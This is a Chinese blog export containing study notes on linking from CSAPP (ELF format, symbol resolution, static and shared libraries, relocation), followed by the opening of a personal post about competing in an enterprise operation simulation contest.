<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/184795/25/30489/21855/634eb0a2E49b23fa0/c1b61a8b596a78eb.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/184795/25/30489/21855/634eb0a2E49b23fa0/c1b61a8b596a78eb.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/184795/25/30489/21855/634eb0a2E49b23fa0/c1b61a8b596a78eb.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>ELF：Executable and Linkable Format(可执行可链接格式)</p>
<p>ELF头以一个16字节的序列开始，前四个字节被称为魔数，用来确认文件类型；第5个字节表示ELF文件类型：0x1代表32位，0x2代表64位；第6个字节表示字节序：0x1代表小端法，0x2代表大端法；第7个字表示ELF的版本号，通常都是0x1；剩余的字节填充为0。ELF头剩下的部分包含帮助链接器语法分析和解释目标文件的信息。</p>
<p>夹在ELF头和节头部表之间的都是节。较为重要的节如下：</p>
<table>
<thead>
<tr>
<th>名称</th>
<th>内容</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td>.text</td>
<td>已编译程序的机器代码</td>
<td></td>
</tr>
<tr>
<td>.rodata</td>
<td>read-only data。比如printf语句中的格式串</td>
<td></td>
</tr>
<tr>
<td>.data</td>
<td>已初始化的全局和静态变量</td>
<td>局部变量不在.data也不在.bss，保存在栈中</td>
</tr>
<tr>
<td>.bss</td>
<td>未初始化以及初始化为0的的全局和静态变量</td>
<td>不占据空间，仅是占位符</td>
</tr>
<tr>
<td>.symtab</td>
<td><strong>符号表</strong>，包含在程序中定义和引用的函数和全局变量的信息</td>
<td></td>
</tr>
<tr>
<td>.rel.text</td>
<td>机器代码的重定位信息</td>
<td></td>
</tr>
<tr>
<td>.rel.data</td>
<td>被模块引用或定义的所有全局变量的重定位信息</td>
<td></td>
</tr>
</tbody></table>
<h2 id="符号和符号表"><a href="#符号和符号表" class="headerlink" title="符号和符号表"></a>符号和符号表</h2><p>链接过程的本质就是将不同的目标文件粘合在一起，而<strong>符号</strong>则可以看作是链接过程的<strong>粘合剂</strong>。</p>
<p>下图为ELF符号表的条目：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/123535/26/31854/52567/634eb0b6E44532b10/c30e083900f405ad.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/123535/26/31854/52567/634eb0b6E44532b10/c30e083900f405ad.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/123535/26/31854/52567/634eb0b6E44532b10/c30e083900f405ad.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>在使用<code>readelf -s main.o</code>命令查看<code>main.o</code>程序的符号表时，要注意section字段有3个特殊的伪节：</p>
<table>
<thead>
<tr>
<th>名称</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td>ABS</td>
<td>代表不被重定位的符号</td>
</tr>
<tr>
<td>UNDEF</td>
<td>代表未定义的符号，即在本目标模块中引用、在别处定义的符号</td>
</tr>
<tr>
<td>COMMON</td>
<td>表示还未被分配位置的未初始化的数据目标</td>
</tr>
</tbody></table>
<p><strong>注意：只有可重定位目标文件中才有这些伪节，可执行目标文件中没有。</strong></p>
<p><code>COMMON</code>和<code>.bss</code>的区别：</p>
<ul>
<li>COMMON: 未初始化的全局变量</li>
<li>.bss: 未初始化的静态变量，以及初始化为0的全局或静态变量</li>
</ul>
<h2 id="符号解析与静态库"><a href="#符号解析与静态库" class="headerlink" title="符号解析与静态库"></a>符号解析与静态库</h2><h3 id="符号解析"><a href="#符号解析" class="headerlink" title="符号解析"></a>符号解析</h3><blockquote>
<p>链接器解析符号引用的方法是将每个引用与它的可重定位目标文件的符号表中的一个确定的符号定义关联起来。</p>
</blockquote>
<p>换言之，一个符号至少要对应一个定义，无论两者是在同一模块还是不同模块。(每个模块中每个局部符号只有一个定义，全局符号引用解析的情况较为复杂，因为多个目标文件可能会定义相同名字的全局符号)</p>
<ul>
<li>强符号：函数和已初始化的全局变量</li>
<li>弱符号：未初始化的全局变量</li>
</ul>
<p>编译器解析多重定义的全局符号有以下三条规则：</p>
<ul>
<li>不允许有多个同名的强符号</li>
<li>如果有一个强符号和多个弱符号同名，那么选择强符号</li>
<li>如果有多个弱符号同名，那么从这些弱符号中任意选择一个</li>
</ul>
<p>规则2和规则3常常引发一些不易察觉的错误。为了避免此类错误，可以在编译时添加<code>-fno-common</code>选项，该选项会使得链接器在 遇到多重定义的全局符号时触发一个错误；或者添加<code>-Werror</code>选项，该选项会把所有的警告变成错误。</p>
<h3 id="静态库"><a href="#静态库" class="headerlink" title="静态库"></a>静态库</h3><blockquote>
<p>所有的编译系统都提供一种机制，将所有相关的目标模块打包成为一个单独的文件，称为<em>静态库</em>。</p>
</blockquote>
<p>静态库文件，又称存档(archive)文件。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/42837/29/19545/50720/634eb0c9E57c7e8c2/0be30553100a194f.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/42837/29/19545/50720/634eb0c9E57c7e8c2/0be30553100a194f.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/42837/29/19545/50720/634eb0c9E57c7e8c2/0be30553100a194f.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>将上图<code>addvec.c</code>和<code>multvec.c</code>构造成一个静态库：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">gcc -c addvec.c multvec.c</span><br><span class="line">ar rcs libvector.a addvec.o multvec.o</span><br></pre></td></tr></tbody></table></figure>

<p>第一行代码得到两个目标文件<code>addvec.o</code>和<code>multvec.o</code>，再输入第二行代码就构造了一个名为<code>libvector.a</code>的静态库。下图程序可以调用这个静态库，其中<code>vector.h</code>定义了这个静态库<code>libvector.a</code>中的函数原型。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/117145/22/27855/34784/634eb0e0E3d0261d7/182c27ba6baa5f96.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/117145/22/27855/34784/634eb0e0E3d0261d7/182c27ba6baa5f96.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/117145/22/27855/34784/634eb0e0E3d0261d7/182c27ba6baa5f96.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>

<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">gcc -c main2.c</span><br><span class="line">gcc -static -o prog2c main2.o ./libvector.a</span><br></pre></td></tr></tbody></table></figure>

<p>上述代码将源文件<code>main2.c</code>编译为目标文件<code>main2.o</code>，然后链接目标文件<code>main2.o</code>和静态库文件<code>libvector.a</code>，创建了可执行文件<code>prog2c</code>。过程如下图所示：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/180883/3/29609/31469/634eb0f3E7f54c3c6/3a4b78237d55960f.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/180883/3/29609/31469/634eb0f3E7f54c3c6/3a4b78237d55960f.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/180883/3/29609/31469/634eb0f3E7f54c3c6/3a4b78237d55960f.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>由于链接器判定<code>main2.o</code>只引用了<code>libvector.a</code>中<code>addvec.o</code>的<code>addvec</code>符号，因此只复制<code>addvec.o</code>到可执行文件，而不复制<code>multvec.o</code>。</p>
<h2 id="静态库的解析过程"><a href="#静态库的解析过程" class="headerlink" title="静态库的解析过程"></a>静态库的解析过程</h2><figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">gcc -static -o prog2c main2.o ./libvector.a</span><br></pre></td></tr></tbody></table></figure>

<p>上一节中使用上式链接源文件和静态库，其中涉及到利用静态库解析符号引用。具体过程如下：<br>链接器维护3个集合，分别为：</p>
<ul>
<li>E，输入的可重定位目标文件集合</li>
<li>U，引用了但是尚未定义的符号的集合</li>
<li>D，已定义的符号的集合</li>
</ul>
<p>链接器从左到右扫描可重定位目标文件和存档（静态库）文件，因此首先输入可重定位目标文件<code>main.o</code>。<code>main.o</code>进入集合E；<code>addvec</code>和<code>printf</code>符号没有在<code>main.o</code>中被定义，因此进入集合U；剩余的进入集合D。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/137035/34/30540/11879/634eb107Ec3451ebf/e4d5ce4801b024aa.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/137035/34/30540/11879/634eb107Ec3451ebf/e4d5ce4801b024aa.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/137035/34/30540/11879/634eb107Ec3451ebf/e4d5ce4801b024aa.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>接着，继续扫描到存档文件<code>libvector.a</code>，存档文件不进入集合E。链接器尝试匹配U中未解析的符号和由存档文件成员定义的符号，链接器发现<code>libvector.a</code>的成员<code>addvec.o</code>中存在符号<code>addvec</code>的定义，因此将<code>addvec.o</code>加入集合E，并将<code>addvec</code>从集合U中删除，另外<code>addvec.o</code>中定义的其他符号，即<code>addcnt</code>会被加入到集合D中。对静态库中每个成员目标文件都会进行上述过程，此例中另一个成员<code>multvec.o</code>没有定义U中的符号，因此集合U和D不发生变化，链接器继续处理下一个输入的文件。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/84793/31/32090/14156/634eb11aEa0f464bb/5086625a8e174b73.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/84793/31/32090/14156/634eb11aEa0f464bb/5086625a8e174b73.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/84793/31/32090/14156/634eb11aEa0f464bb/5086625a8e174b73.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>上面的代码实际上隐式执行了对静态库<code>libc.a</code>的链接，实际上会输入<code>libc.a</code>，执行上述过程后集合情况如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/142608/8/30688/15262/634eb130E8f48a70f/36122f4a6c8b3702.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/142608/8/30688/15262/634eb130E8f48a70f/36122f4a6c8b3702.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/142608/8/30688/15262/634eb130E8f48a70f/36122f4a6c8b3702.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>此时集合U为空，说明没有未定义的符号，链接器将合并和重定位E中的目标文件，构造可执行目标文件。若集合U非空，则说明有未定义的符号，链接器将输出一个错误并终止。</p>
<p>这个过程也解释了命令行输入文件的顺序的重要性，例如将<code>main2.o</code>与<code>./libvector.a</code>互换位置，由于输入<code>libvector</code>时集合U为空，因此<code>addvec.o</code>不会被加入集合E，因此最后集合U中会存在未定义符号<code>addvec</code>，从而导致错误。</p>
<h2 id="重定位"><a href="#重定位" class="headerlink" title="重定位"></a>重定位</h2><p>在上一节中链接器确定了一个集合E，即要合并的目标文件，接下来就需要进行重定位操作。重定位分为两步：</p>
<ul>
<li>重定位节和符号定义</li>
<li>重定位节中的符号引用</li>
</ul>
<h3 id="重定位节和符号引用"><a href="#重定位节和符号引用" class="headerlink" title="重定位节和符号引用"></a>重定位节和符号引用</h3><p>示意图如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/109149/18/33792/129136/634eb140Ee566b95b/3fb59d157863377d.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/109149/18/33792/129136/634eb140Ee566b95b/3fb59d157863377d.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/109149/18/33792/129136/634eb140Ee566b95b/3fb59d157863377d.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>这一步完成后，程序中每条指令和全局变量都有唯一的运行时内存地址了。</p>
<h3 id="重定位节中的符号引用"><a href="#重定位节中的符号引用" class="headerlink" title="重定位节中的符号引用"></a>重定位节中的符号引用</h3><p>这一步依赖重定位条目，对于代码的重定位条目位于<code>.rel.text</code>，对于已初始化数据的重定位条目位于<code>.rel.data</code>。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/176914/15/29848/39627/634eb153E0acab51a/3b9cf273cfe87685.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/176914/15/29848/39627/634eb153E0acab51a/3b9cf273cfe87685.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/176914/15/29848/39627/634eb153E0acab51a/3b9cf273cfe87685.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>上图展示了ELF重定位条目的结构体定义。其中<code>type</code>（重定位类型)有32种，需要知道的有两种：</p>
<ul>
<li>R_X86_64_PC32（PC相对地址，PC值通常是下一条指令在内存中的地址）</li>
<li>R_X86_64_32（绝对地址）</li>
</ul>
<p>关于重定位的计算，可以参考<a href="https://www.bilibili.com/video/BV1JL411L7ku/?spm_id_from=333.788&amp;vd_source=4e92f73cbc9617a81ba285264ffa8b21">【CSAPP-深入理解计算机系统】7-6. 重定位_哔哩哔哩_bilibili</a></p>
<h2 id="可执行目标文件"><a href="#可执行目标文件" class="headerlink" title="可执行目标文件"></a>可执行目标文件</h2><div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/10827/33/20034/40188/634eb167Ea13401e6/34b8bff6aa404b53.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/10827/33/20034/40188/634eb167Ea13401e6/34b8bff6aa404b53.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/10827/33/20034/40188/634eb167Ea13401e6/34b8bff6aa404b53.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>如图所示为典型的ELF可执行目标文件<br>ELF可执行文件的连续的片被映射到连续的内存段，程序头部表描述了这种映射关系。</p>
<p>将程序从磁盘复制到内存的过程叫做<strong>加载</strong>。加载器运行时，创建内存映像，在程序头部表的引导下，加载器将可执行文件的片复制到代码段和数据段，然后加载器跳转到程序的入口点。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/195189/4/28443/67990/634eb179E21703543/6728719e0f45347c.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/195189/4/28443/67990/634eb179E21703543/6728719e0f45347c.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/195189/4/28443/67990/634eb179E21703543/6728719e0f45347c.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>如图所示为Linux x86-64运行时的内存映像。</p>
<h2 id="动态链接共享库"><a href="#动态链接共享库" class="headerlink" title="动态链接共享库"></a>动态链接共享库</h2><blockquote>
<p><em>共享库</em>是一个目标模块，在运行或加载时，可以加载到任意的内存地址，并和一个在内存中的程序链接起来。这个过程称为<em>动态链接</em>，是由一个叫做<em>动态链接器</em>的程序来执行的。</p>
</blockquote>
<p>构造共享库的方式与构造静态库的方式很相似，只需将构造静态库的代码修改为：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">gcc -shared -fpic -o libvector.so addvec.c multvec.c</span><br></pre></td></tr></tbody></table></figure>

<p>动态链接共享库的过程如图所示：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/203281/17/28336/42024/634eb18dE02711f7a/01a276920d6d2f65.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/203281/17/28336/42024/634eb18dE02711f7a/01a276920d6d2f65.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/203281/17/28336/42024/634eb18dE02711f7a/01a276920d6d2f65.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>此外，还可以从应用程序中加载和链接共享库。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/20079/10/18954/19705/634eb1aaEc8843c5a/ce326ca458cd49a0.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/20079/10/18954/19705/634eb1aaEc8843c5a/ce326ca458cd49a0.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/20079/10/18954/19705/634eb1aaEc8843c5a/ce326ca458cd49a0.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p><code>dlopen</code>函数加载和链接共享库<code>filename</code></p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/92289/7/22938/20139/634eb1beE46641a0d/172d988c21f67e68.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/92289/7/22938/20139/634eb1beE46641a0d/172d988c21f67e68.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/92289/7/22938/20139/634eb1beE46641a0d/172d988c21f67e68.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p><code>dlsym</code>函数返回输入符号的地址</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/147888/5/30474/15813/634eb1d1E8782e8a7/a0dead929423729e.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/147888/5/30474/15813/634eb1d1E8782e8a7/a0dead929423729e.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/147888/5/30474/15813/634eb1d1E8782e8a7/a0dead929423729e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>如果没有其他共享库还在使用该共享库，<code>dlclose</code>函数就卸载该共享库</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/129870/32/29744/23258/634eb1e1E2a7c5ed3/02a68599e69c7024.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/129870/32/29744/23258/634eb1e1E2a7c5ed3/02a68599e69c7024.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/129870/32/29744/23258/634eb1e1E2a7c5ed3/02a68599e69c7024.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p><code>dlerror</code>函数返回<code>dlopen</code>、<code>dlsym</code>或<code>dlclose</code>函数的错误信息。</p>
<h3 id="库打桩机制"><a href="#库打桩机制" class="headerlink" title="*库打桩机制"></a>*库打桩机制</h3><p>作用：截获对共享库函数的调用，用其他代码取代</p>
<ul>
<li>编译时打桩</li>
<li>链接时打桩</li>
<li>运行时打桩</li>
</ul>
]]></content>
      <categories>
        <category>阅读笔记</category>
      </categories>
      <tags>
        <tag>CSAPP</tag>
        <tag>系统</tag>
      </tags>
  </entry>
  <entry>
    <title>EOVS——企业运营仿真赛参赛记录</title>
    <url>/posts/eovs/</url>
    <content><![CDATA[<p>去年12月中旬随队参加了第十二届上海市大学生工程实践与创新能力大赛——企业运营仿真赛项，获得了特等奖，也是我在乏善可陈的大学生活中拿到的第一个市级奖项。前段时间忙于“补天”（预习期末科目）没有更新，2023的第一篇文章就从这项比赛着笔吧。<span id="more"></span></p>
<h2 id="什么是EOVS？"><a href="#什么是EOVS？" class="headerlink" title="什么是EOVS？"></a>什么是EOVS？</h2><p>EOVS，又称企业运营仿真赛，是商赛的一种。竞赛内容引用<a href="http://sx.qyyyfz.com/introduction.jsp">原文</a>：</p>
<blockquote>
<p>参赛队员组建经营团队，每个团队分设总经理、财务总监、生产总监、营销总监4个岗位，需要创建一家生产制造型企业，模拟该企业两年八个季度的经营过程。涉及公司创建、材料采购、生产运营、市场营销、财务管理等相关企业经营活动。在企业运营过程中，竞赛团队应充分考虑企业的外部环境和企业内部运营状况，结合竞争对手情况，制定科学合理的企业运营策略，管理企业运营风险，实现企业利润最大化。</p>
</blockquote>
<p>该赛项的组织机构是在<code>教育部工程训练竞赛组委会</code>领导下成立的<code>企业运营仿真赛项组委会</code>。不难看出，赛事的含金量远比不上著名的贝恩杯、奥纬杯、华为财务精英挑战赛等，但在全国范围内还是有一定热度的。另外，引用<a href="http://www.gcxl.edu.cn/new/index.html">中国大学生工程实践与创新能力大赛官网</a>：</p>
<blockquote>
<p>中国大学生工程实践与创新能力大赛是列入《教育部评审评估和竞赛清单（2021年版）》（教政法厅函(2021)2号）的重要赛事。</p>
</blockquote>
<p>亦即是说这是一项被教育部认可的比赛。抛开功利去谈这项比赛的话，我更愿意称其为一款游戏，一款模拟经营类游戏、倾向于协作的团队游戏。打完一局标准、完整的比赛大概需要4-5个小时，每一次打训练赛都像是酣畅淋漓地玩了一场烧脑的策略游戏。</p>
<h2 id="为什么会参加EOVS？"><a href="#为什么会参加EOVS？" class="headerlink" title="为什么会参加EOVS？"></a>为什么会参加EOVS？</h2><p>众所周知，我是打工人工科生，商赛的名头对我来说没什么吸引力。大一上学期时（2021年秋）认识了个朋友，挺社牛的，拉着我参加企业运营仿真赛的校内赛。当时挺闲的，再加上第一名的队伍有1000元奖金（平摊下来每个人250……，奇怪的数字，但是用来好好吃一顿不香吗），就一起报名参加了。</p>
<h2 id="参赛经历"><a href="#参赛经历" class="headerlink" title="参赛经历"></a>参赛经历</h2><h3 id="校内赛夺魁"><a href="#校内赛夺魁" class="headerlink" title="校内赛夺魁"></a>校内赛夺魁</h3><p>接着说校内赛，当时报名的队伍有20多支，正式比赛前举办了两次友谊赛，其实对于很多队伍来说就是训练赛了，毕竟一半以上的队伍都是第一次参加这项比赛。参赛选手倒是来自各个学院、各个专业，也有被我们视作一号种子的、由经管学院学长学姐组成的队伍。我们由于时间原因只参加了一次训练赛。到了正式比赛的时候，分成了两组比赛——幸运的是，一号种子队伍和我们分在了两组。虽然说我们只参加了一次训练赛，实际上我们查阅了许多资料，做足了准备。到了赛场上发现有些组连计算用的Excel表格都没有（重要道具，后面会讲），导致他们预期的利润和实际偏差太大，早早地就破产出局了。比赛到一半的时候我们的动态排名还是第三，但由于前期高额的研发投入让我们的产品有明显的质量优势，在最后两季度我们凭借高价、高销量挣得更多净利润，最终排名组内第一。由于分了两组，所以第一只有500元奖金了（哭），赛后就只能在食堂吃了庆功宴。</p>
<h3 id="知翰杯“百团大战”惨遭滑铁卢"><a href="#知翰杯“百团大战”惨遭滑铁卢" class="headerlink" title="知翰杯“百团大战”惨遭滑铁卢"></a>知翰杯“百团大战”惨遭滑铁卢</h3><p>校内赛拿到组内第一之后，我们的心态产生了一些变化——不再只是“重在参与”了，而是争得更高级别的奖项。“百团大战”是2022年暑假举办的一次全国性企业运营仿真赛，其实那时距离我们参加校内赛已经半年多了，水平基本上可以说是没有提升。因为疫情原因我们甚至不知道这项赛事能否举办，因此只是在开赛前几个星期训练了几次。另外，这项赛事的低含金量导致它在我们学校的受重视程度比较低，我们没有像很多学校那样接受培训。这次比赛是分赛区举办的，华东赛区参赛省份有江苏、浙江、上海、安徽，规模和选手实力都和校内赛时不可同日而语。比赛采用分组积分制，具体前几名晋级我也记不大清了。只记得参赛的队伍风格异常凶悍，完全不按套路来，我们打的3场比赛全部以破产告终，最快的一次甚至第一个季度就破产了。一分未得，在意料之外，也在情理之中——的确是技不如人。</p>
